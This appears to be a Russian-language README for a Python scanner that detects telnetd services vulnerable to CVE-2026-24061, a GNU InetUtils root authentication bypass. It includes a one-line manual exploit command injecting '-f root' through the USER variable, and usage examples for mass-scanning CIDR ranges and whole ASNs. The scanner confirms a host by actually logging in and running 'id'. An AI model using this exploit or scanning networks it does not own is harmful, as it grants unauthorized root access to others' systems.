
CVE-2026-24061 — Удалённый обход аутентификации в GNU InetUtils Telnetd
Мощный, быстрый и элегантный сканер для обнаружения уязвимых служб Telnetd, затронутых CVE-2026-24061. Создан на чистой стандартной библиотеке Python — без внешних зависимостей.
CVE-2026-24061 — критическая уязвимость обхода аутентификации в GNU InetUtils Telnetd, которая позволяет неаутентифицированным удалённым злоумышленникам получить root-доступ, эксплуатируя обработку опции NEW-ENVIRON.
Ниже приведена конфигурация службы Telnetd на стороне целевого хоста.
А вот доказательство концепции (PoC) для этой уязвимости, которое можно выполнить вручную с хоста злоумышленника, просто запустив команду USER="-f root" telnet -a <TARGET_HOST> 23.
Уязвимость эксплуатирует некорректную проверку переменной окружения USER при согласовании опции telnet NEW-ENVIRON (RFC 1572), позволяя злоумышленникам внедрять вредоносные значения, такие как -f root, для обхода аутентификации.
9.8 (Критическая) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
# Клонирование репозитория
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner
# Сделать исполняемым
sudo chmod +x twenty-three-scanner.py
# Запуск скрипта
sudo python3 twenty-three-scanner.py -h
Ниже приведено руководство по инструменту Twenty-Three Scanner, который можно использовать для обнаружения уязвимости CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass.
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
[--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]
CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass
options:
-h, --help show this help message and exit
Target Options:
-t TARGET, --target TARGET
target IP, CIDR, or comma-separated list (can be used multiple times)
-f FILE, --file FILE file containing targets (one per line, supports comments with #)
-a ASN, --asn ASN autonomous system number (e.g., AS10111 or 10111)
Scan Options:
-p PORT, --port PORT target port(s), comma-separated (default: 23)
--threads N number of concurrent threads (default: 50)
--user-value VALUE USER environment variable value for exploit (default: '-f root')
Timeout Options:
--connect-timeout SEC
TCP connection timeout in seconds (default: 3.0)
--read-timeout SEC socket read timeout in seconds (default: 2.0)
--id-timeout SEC 'id' command response timeout in seconds (default: 2.0)
Limit Options:
--max-hosts-per-cidr N
maximum hosts to scan per CIDR block (default: 1024)
--max-total-hosts N maximum total hosts across all targets (default: 50000)
--skip-large-networks
skip networks larger than /16 (avoids accidentally scanning huge ranges)
Output Options:
-o FILE, --output FILE
save vulnerable hosts to file (format: IP:PORT)
-v, --verbose enable verbose debug logging
А вот несколько примеров использования команды.
# Сканирование одного IP-адреса и одного порта
sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23
# Сканирование одного IP-адреса и нескольких портов
sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323
# Сканирование нескольких IP-адресов и одного порта
sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23
# Сканирование нескольких адресов и нескольких портов
sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323
# Сканирование диапазона CIDR и одного порта с сохранением результатов
sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt
# Сканирование диапазона CIDR и нескольких портов с сохранением результатов
sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt
# Сканирование одного IP-адреса, нескольких адресов или диапазона CIDR из файла и одного порта с настраиваемыми потоками и выводом
sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt
# Сканирование одного IP-адреса, нескольких IP-адресов или диапазона CIDR из файла и нескольких портов с настраиваемыми потоками и выводом
sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt
# Сканирование ASN и одного порта с настраиваемыми потоками
sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100
# Сканирование ASN и нескольких портов с настраиваемыми потоками
sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100
# Сканирование ASN с настраиваемыми ограничениями и потоками
sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100
Сканирование одного IP-адреса с несколькими портами.
Сканирование нескольких IP-адресов с одним портом.
Сканирование диапазона CIDR с одним портом.
Сканирование ASN с несколькими портами.
Сканирование одного IP-адреса, нескольких адресов или диапазона CIDR из файла и одного порта с настраиваемыми потоками и выводом.